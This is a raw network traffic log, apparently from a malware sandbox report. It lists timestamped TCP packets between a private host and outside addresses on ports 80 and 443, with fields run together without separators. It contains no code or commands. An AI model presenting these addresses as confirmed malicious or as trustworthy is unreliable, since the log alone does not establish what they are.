                                                                                                          Oct 30, 2024 08:19:41.890305042 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.890316010 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.890332937 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.890346050 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.890392065 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.890403032 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066142082 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066158056 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066169024 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066179991 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066185951 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066196918 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066199064 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066205978 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066211939 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066226959 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066235065 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066245079 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066255093 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066268921 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066281080 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066306114 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066320896 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066333055 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066343069 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066344976 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066359043 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066380978 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066391945 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066426039 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066488028 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066498041 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066508055 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066523075 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066539049 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066610098 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066621065 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066632986 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066648960 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066663027 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066672087 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066682100 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066700935 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066711903 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066869020 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066879034 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066890955 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066900969 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066905975 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066919088 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066932917 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066936970 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066948891 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066960096 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066966057 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066977024 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066992044 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.067039967 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067050934 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067061901 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067073107 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067087889 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.067096949 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.067111969 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.067154884 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067192078 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.067250013 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067260027 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067290068 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.067293882 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067306042 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067322016 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.067332029 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067337036 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.067343950 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067354918 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067361116 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.067368031 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067372084 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.067388058 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.067394972 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067405939 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.067405939 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067419052 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.067433119 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.067481995 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067492008 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067502022 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067518950 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.067531109 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.067605972 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067616940 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067626953 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067642927 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.067656040 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.067866087 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067877054 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067888975 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067905903 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.067923069 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.067960024 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067970037 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067981005 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067991972 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068011045 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068026066 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068100929 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068110943 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068120956 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068131924 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068140030 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068142891 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068147898 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068154097 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068164110 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068166018 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068176985 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068176985 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068187952 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068202972 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068217993 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068233013 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068248987 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068264961 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068269014 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068289995 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068391085 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068401098 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068430901 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068476915 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068487883 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068509102 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068523884 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068587065 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068597078 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068608046 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068619967 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068624973 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068635941 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068650007 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068675995 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068685055 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068695068 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068706989 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068711042 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068717957 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068722963 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068736076 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068753004 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068763018 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068773985 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068799019 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068856001 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068867922 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068897963 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068900108 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068911076 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068921089 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068929911 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068943024 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.069015026 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.069025040 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.069036007 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.069047928 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.069052935 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.069060087 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.069063902 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.181920052 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.181932926 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.181935072 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.181947947 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.181965113 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.181968927 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.181978941 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.181994915 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.182010889 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.182326078 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.182365894 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.182375908 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.182387114 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.182410002 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.182418108 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.182459116 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.182468891 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.182497025 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.182619095 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.182629108 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.182660103 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.182699919 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.182738066 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.183104992 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183145046 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.183162928 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183172941 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183197975 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.183258057 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183268070 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183284044 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183295012 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183299065 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.183306932 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183319092 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.183335066 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.183350086 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183355093 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.183361053 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183378935 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.183393955 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.183473110 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183482885 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183494091 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183511019 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183511019 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.183521986 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183527946 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.183531046 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183546066 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.183562994 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.183634043 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183644056 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183655024 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183674097 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.183685064 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.183743000 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183753014 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183780909 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.183938026 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183948040 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183959007 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.183979034 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.183991909 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184029102 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184040070 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184051037 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184061050 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184062958 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184081078 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184082031 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184093952 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184094906 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184104919 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184109926 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184124947 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184138060 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184158087 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184169054 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184179068 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184189081 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184194088 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184199095 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184207916 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184222937 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184233904 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184279919 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184289932 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184300900 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184312105 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184315920 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184330940 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184345007 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184453964 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184464931 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184480906 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184490919 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184499025 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184499979 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184513092 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184514999 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184530020 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184531927 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184540987 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184545040 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184551954 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184557915 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184570074 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184585094 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184604883 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184614897 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184624910 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184632063 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184643984 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184659004 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184760094 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184771061 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184802055 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.184861898 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184873104 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.184900999 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.185086012 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.185096979 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.185107946 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.185123920 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.185137987 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.372137070 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:46.450398922 CET4916280192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:19:46.456175089 CET8049162132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:19:46.456253052 CET4916280192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:19:46.457041025 CET4916280192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:19:46.462486029 CET8049162132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:19:47.347378969 CET8049162132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:19:47.370827913 CET4916280192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:19:47.376267910 CET8049162132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:19:47.654726028 CET8049162132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:19:47.874475002 CET8049162132.226.8.169192.168.2.22
                                                                                                          Oct 30, 2024 08:19:47.874536991 CET4916280192.168.2.22132.226.8.169
                                                                                                          Oct 30, 2024 08:19:48.687002897 CET49163443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:19:48.687036037 CET44349163188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:48.687082052 CET49163443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:19:48.694617987 CET49163443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:19:48.694628954 CET44349163188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:49.347184896 CET44349163188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:49.347244978 CET49163443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:19:49.357356071 CET49163443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:19:49.357382059 CET44349163188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:49.357888937 CET44349163188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:49.451366901 CET49163443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:19:49.495331049 CET44349163188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:49.594788074 CET44349163188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:49.594875097 CET44349163188.114.96.3192.168.2.22
                                                                                                          Oct 30, 2024 08:19:49.594990015 CET49163443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:19:49.610152006 CET49163443192.168.2.22188.114.96.3
                                                                                                          Oct 30, 2024 08:19:49.635246038 CET4916280192.168.2.22132.226.8.169
